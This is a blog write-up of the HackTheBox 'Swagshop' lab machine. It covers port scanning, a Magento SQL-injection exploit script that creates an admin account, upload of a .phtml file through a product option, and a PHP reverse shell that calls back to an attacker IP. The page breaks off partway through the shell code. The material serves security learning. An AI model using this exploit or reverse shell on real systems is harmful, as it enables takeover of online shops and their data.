<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : ch4pIP : 10.10.10.140[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.140
 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Once seen that, we can get a deeper scan to those ports :'><title>[3] Swagshop HackTheBox</title>

<link rel='canonical' href='https://example.com/posts/swagshop-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[3] Swagshop HackTheBox'>
<meta property='og:description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : ch4pIP : 10.10.10.140[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.140
 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Once seen that, we can get a deeper scan to those ports :'>
<meta property='og:url' content='https://example.com/posts/swagshop-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-03-09T23:25:54&#43;01:00'/><meta property='article:modified_time' content='2021-03-09T23:25:54&#43;01:00'/>
<meta name="twitter:title" content="[3] Swagshop HackTheBox">
<meta name="twitter:description" content="[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : ch4pIP : 10.10.10.140[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.140
 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Once seen that, we can get a deeper scan to those ports :">
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/swagshop-hackthebox/">[3] Swagshop HackTheBox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Mar 09, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <p><img src="/static/HACKING/swagshop-index.jpg" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="-index">[*] INDEX:</h1>
<ul>
<li><a class="link" href="#-box-info--" >BOX INFO</a></li>
<li><a class="link" href="#-part-1---gain-access" >GAINING ACCESS</a></li>
<li><a class="link" href="#-part-2---privesc" >PRIVILEGE ESCALATION</a></li>
</ul>
<h1 id="-box-info-computer-">[+] BOX INFO :computer: :</h1>
<pre><code>Operative System : Linux :penguin:
Difficulty : Easy :waxing_gibbous_moon:
Owner : ch4p
IP : 10.10.10.140
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>To get a fast scan, we&rsquo;re using this command to discovery ports:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-p-&#43;--open&#43;-T5&#43;-n&#43;10.10.10.140"  target="_blank" rel="noopener"
    >nmap -p- &ndash;open -T5 -n 10.10.10.140</a></p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</code></pre></div><p>Once seen that, we can get a deeper scan to those ports :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-sC&#43;-sS&#43;-p22%2C80&#43;10.10.10.140"  target="_blank" rel="noopener"
    >nmap -sC -sS -p22,80 10.10.10.140</a></p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
<span class="p">|</span> ssh-hostkey: 
<span class="p">|</span>   <span class="m">2048</span> b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec <span class="o">(</span>RSA<span class="o">)</span>
<span class="p">|</span>   <span class="m">256</span> 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba <span class="o">(</span>ECDSA<span class="o">)</span>
<span class="p">|</span>_  <span class="m">256</span> 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span>
<span class="p">|</span>_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span>
<span class="p">|</span>_http-title: Home page
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</code></pre></div><p>Nice, here we can see a website, so let&rsquo;s check it :</p>
<p><img src="/static/HACKING/swagshop-1.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>OH! A HackTheBox merch shop, using <code>whatweb</code> we can extract this info :</p>
<blockquote>
<p>whatweb http://10.10.10.140/</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">http://10.10.10.140/ <span class="o">[</span><span class="m">200</span> OK<span class="o">]</span> Apache<span class="o">[</span>2.4.18<span class="o">]</span>, Cookies<span class="o">[</span>frontend<span class="o">]</span>, Country<span class="o">[</span>RESERVED<span class="o">][</span>ZZ<span class="o">]</span>, HTML5, HTTPServer<span class="o">[</span>Ubuntu Linux<span class="o">][</span>Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)]</span>, HttpOnly<span class="o">[</span>frontend<span class="o">]</span>, IP<span class="o">[</span>10.10.10.140<span class="o">]</span>, JQuery<span class="o">[</span>1.10.2<span class="o">]</span>, Magento, Modernizr, Prototype, Script<span class="o">[</span>text/javascript<span class="o">]</span>, Scriptaculous, Title<span class="o">[</span>Home page<span class="o">]</span>, X-Frame-Options<span class="o">[</span>SAMEORIGIN<span class="o">]</span>
</code></pre></div><p>To be honest here is nothing interesting, except Magento, a eCommerce Platform as WordPress. Even though I couldn&rsquo;t figure out which version was running there, so I tried on <code>searchsploit</code>.</p>
<blockquote>
<p>searchsploit magento</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           <span class="p">|</span>  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection                                                                                                                                             <span class="p">|</span> php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script <span class="o">(</span>Code Execution / Denial of Service<span class="o">)</span>                                                                                                                  <span class="p">|</span> php/webapps/38651.txt
Magento 1.2 - <span class="s1">&#39;/app/code/core/Mage/Admin/Model/Session.php?login[&#39;</span>Username<span class="s1">&#39;]&#39;</span> Cross-Site Scripting                                                                                                       <span class="p">|</span> php/webapps/32808.txt
Magento 1.2 - <span class="s1">&#39;/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email&#39;</span> Cross-Site Scripting                                                                                                 <span class="p">|</span> php/webapps/32809.txt
Magento 1.2 - <span class="s1">&#39;downloader/index.php&#39;</span> Cross-Site Scripting                                                                                                                                                <span class="p">|</span> php/webapps/32810.txt
Magento &lt; 2.0.6 - Arbitrary Unserialize / Arbitrary Write File                                                                                                                                           <span class="p">|</span> php/webapps/39838.php
Magento CE &lt; 1.9.0.1 - <span class="o">(</span>Authenticated<span class="o">)</span> Remote Code Execution                                                                                                                                             <span class="p">|</span> php/webapps/37811.py
Magento eCommerce - Local File Disclosure                                                                                                                                                                <span class="p">|</span> php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                                                                                                                                                                <span class="p">|</span> xml/webapps/37977.py
Magento Server MAGMI Plugin - Multiple Vulnerabilities                                                                                                                                                   <span class="p">|</span> php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion                                                                                                                                              <span class="p">|</span> php/webapps/35052.txt
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass                                                                                                                             <span class="p">|</span> php/webapps/48135.php
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
</code></pre></div><p>Many interesting exploits, but I will just filter by &ldquo;Remote Code Execution&rdquo;.</p>
<blockquote>
<p>searchsploit magento Remote Code Execution</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           <span class="p">|</span>  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Magento CE &lt; 1.9.0.1 - <span class="o">(</span>Authenticated<span class="o">)</span> Remote Code Execution                                                                                                                                             <span class="p">|</span> php/webapps/37811.py
Magento eCommerce - Remote Code Execution                                                                                                                                                                <span class="p">|</span> xml/webapps/37977.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
</code></pre></div><p>Okay as we can see there are two types of RCE exploits, the first one is an Authenticated one (not our case because we don&rsquo;t have any user), and let&rsquo;s try the second one.</p>
<blockquote>
<p>searchsploit -m xml/webapps/37977.py # -m is used to copy the script in the current directory</p>
</blockquote>
<p>Reading the exploit we need to change some fields:</p>
<div class="highlight"><pre class="chroma"><code class="language-py" data-lang="py"><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">target</span> <span class="o">=</span> <span class="s2">&#34;http://10.10.10.140/index.php&#34;</span> <span class="c1"># In this field is necessary to add &#34;index.php&#34;, because almost every file is located over this directory.</span>

<span class="k">if</span> <span class="ow">not</span> <span class="n">target</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s2">&#34;http&#34;</span><span class="p">):</span>
    <span class="n">target</span> <span class="o">=</span> <span class="s2">&#34;http://&#34;</span> <span class="o">+</span> <span class="n">target</span>

<span class="k">if</span> <span class="n">target</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s2">&#34;/&#34;</span><span class="p">):</span>
    <span class="n">target</span> <span class="o">=</span> <span class="n">target</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>

<span class="n">target_url</span> <span class="o">=</span> <span class="n">target</span> <span class="o">+</span> <span class="s2">&#34;/admin/Cms_Wysiwyg/directive/index/&#34;</span> 

<span class="n">q</span><span class="o">=</span><span class="s2">&#34;&#34;&#34;
</span><span class="s2">SET @SALT = &#39;rp&#39;;
</span><span class="s2">SET @PASS = CONCAT(MD5(CONCAT( @SALT , &#39;{password}&#39;) ), CONCAT(&#39;:&#39;, @SALT ));
</span><span class="s2">SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
</span><span class="s2">INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (&#39;Firstname&#39;,&#39;Lastname&#39;,&#39;email@example.com&#39;,&#39;{username}&#39;&gt;
</span><span class="s2">INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,&#39;U&#39;,(SELECT user_id FROM admin_user WHERE username = &#39;{username}&#39;),&#39;Firstname&#39;);
</span><span class="s2">&#34;&#34;&#34;</span>


<span class="n">query</span> <span class="o">=</span> <span class="n">q</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">username</span><span class="o">=</span><span class="s2">&#34;forme&#34;</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="s2">&#34;forme&#34;</span><span class="p">)</span>
<span class="n">pfilter</span> <span class="o">=</span> <span class="s2">&#34;popularity[from]=0&amp;popularity[to]=3&amp;popularity[field_expr]=0);{0}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">query</span><span class="p">)</span>

<span class="c1"># e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">target_url</span><span class="p">,</span> 
                  <span class="n">data</span><span class="o">=</span><span class="p">{</span><span class="s2">&#34;___directive&#34;</span><span class="p">:</span> <span class="s2">&#34;e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&#34;</span><span class="p">,</span>
                        <span class="s2">&#34;filter&#34;</span><span class="p">:</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64encode</span><span class="p">(</span><span class="n">pfilter</span><span class="p">),</span>
                        <span class="s2">&#34;forwarded&#34;</span><span class="p">:</span> <span class="mi">1</span><span class="p">})</span>
<span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
    <span class="k">print</span> <span class="s2">&#34;WORKED&#34;</span>
    <span class="k">print</span> <span class="s2">&#34;Check {0}/admin with creds forme:forme&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
    <span class="k">print</span> <span class="s2">&#34;DID NOT WORK&#34;</span>
</code></pre></div><p>If everything works without problem, the exploit will give us a &ldquo;admin&rdquo; user with the creds : forme:forme. Let&rsquo;s run it :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python&#43;get_user.py"  target="_blank" rel="noopener"
    >python get_user.py</a></p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">WORKED
Check http://10.10.10.140/index.php/admin with creds forme:forme
</code></pre></div><p>So, as the output says, we got an user! Let&rsquo;s login in here : http://10.10.10.140/index.php/admin</p>
<p><img src="/static/HACKING/swagshop-2.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Once we get here we have to try to get a backdoor to our machine, we should try to establish a reverse shell. Let&rsquo;s do some research.</p>
<p>I fount a post about RCE&amp;LFR : <a href="https://blog.scrt.ch/2019/01/24/magento-rce-local-file-read-with-low-privilege-admin-rights/">https://blog.scrt.ch/2019/01/24/magento-rce-local-file-read-with-low-privilege-admin-rights/</a> so let&rsquo;s follow his steps.</p>
<p>The first step is logging in, we&rsquo;ve just done that, and the second step is Creating a new product, but we&rsquo;re going to edit another product and will work too. So let&rsquo;s go:</p>
<p><img src="/static/HACKING/swagshop-3.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Inside the Admin Panel, you have to go to &ldquo;Catalog:Manage-Products&rdquo; and I selected &ldquo;Hack The Box Logo T-Shirt&rdquo;, but it will work with others too. Let&rsquo;s select &ldquo;Custom options&rdquo; as the post says.</p>
<p><img src="/static/HACKING/swagshop-4.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Here we&rsquo;re adding the option of adding a file, is important to know that the file has to be &ldquo;phtml&rdquo;, which works as an &ldquo;php&rdquo; file, so let&rsquo;s save this change. And the next step is checking out and uploading a php reverse shell with the extension of .phtml.</p>
<p><img src="/static/HACKING/swagshop-5.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Yeah! Here we can see that the changes have worked, so let&rsquo;s get a reverse shell from pentestmonkey for example : <a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php">https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php</a></p>
<p><code>My PHP Reverse Shell</code></p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="o">&lt;?</span><span class="nx">php</span>
<span class="nx">set_time_limit</span> <span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="nv">$VERSION</span> <span class="o">=</span> <span class="s2">&#34;1.0&#34;</span><span class="p">;</span>
<span class="nv">$ip</span> <span class="o">=</span> <span class="s1">&#39;10.10.14.21&#39;</span><span class="p">;</span>  <span class="c1">// CHANGE THIS
</span><span class="c1"></span><span class="nv">$port</span> <span class="o">=</span> <span class="mi">8989</span><span class="p">;</span>       <span class="c1">// CHANGE THIS
</span><span class="c1"></span><span class="nv">$chunk_size</span> <span class="o">=</span> <span class="mi">1400</span><span class="p">;</span>
<span class="nv">$write_a</span> <span class="o">=</span> <span class="k">null</span><span class="p">;</span>
<span class="nv">$error_a</span> <span class="o">=</span> <span class="k">null</span><span class="p">;</span>
<span class="nv">$shell</span> <span class="o">=</span> <span class="s1">&#39;uname -a; w; id; /bin/sh -i&#39;</span><span class="p">;</span>
<span class="nv">$daemon</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="nv">$debug</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">function_exists</span><span class="p">(</span><span class="s1">&#39;pcntl_fork&#39;</span><span class="p">))</span> <span class="p">{</span>
        <span class="nv">$pid</span> <span class="o">=</span> <span class="nx">pcntl_fork</span><span class="p">();</span>
        <span class="k">if</span> <span class="p">(</span><span class="nv">$pid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
                <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Can&#39;t fork&#34;</span><span class="p">);</span>
                <span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">if</span> <span class="p">(</span><span class="nv">$pid</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">if</span> <span class="p">(</span><span class="nx">posix_setsid</span><span class="p">()</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
                <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;Error: Can&#39;t setsid()&#34;</span><span class="p">);</span>
                <span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="nv">$daemon</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;WARNING: Failed to daemonise.  This is quite common and not fatal.&#34;</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">chdir</span><span class="p">(</span><span class="s2">&#34;/&#34;</span><span class="p">);</span>
<span class="nx">umask</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="nv">$sock</span> <span class="o">=</span> <span class="nx">fsockopen</span><span class="p">(</span><span class="nv">$ip</span><span class="p">,</span> <span class="nv">$port</span><span class="p">,</span> <span class="nv">$errno</span><span class="p">,</span> <span class="nv">$errstr</span><span class="p">,</span> <span class="mi">30</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$sock</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;</span><span class="si">$errstr</span><span class="s2"> (</span><span class="si">$errno</span><span class="s2">)&#34;</span><span class="p">);</span>
        <span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Spawn shell process
</span><span class="c1"></span><span class="nv">$descriptorspec</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span>
   <span class="mi">0</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">&#34;pipe&#34;</span><span class="p">,</span> <span class="s2">&#34;r&#34;</span><span class="p">),</span> 
   <span class="mi">1</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">&#34;pipe&#34;</span><span class="p">,</span> <span class="s2">&#34;w&#34;</span><span class="p">),</span> 
   <span class="mi">2</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">&#34;pipe&#34;</span><span class="p">,</span> <span class="s2">&#34;w&#34;</span><span class="p">)</span>   
<span class="p">);</span>

<span class="nv">$process</span> <span class="o">=</span> <span class="nx">proc_open</span><span class="p">(</span><span class="nv">$shell</span><span class="p">,</span> <span class="nv">$descriptorspec</span><span class="p">,</span> <span class="nv">$pipes</span><span class="p">);</span>

<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">is_resource</span><span class="p">(</span><span class="nv">$process</span><span class="p">))</span> <span class="p">{</span>
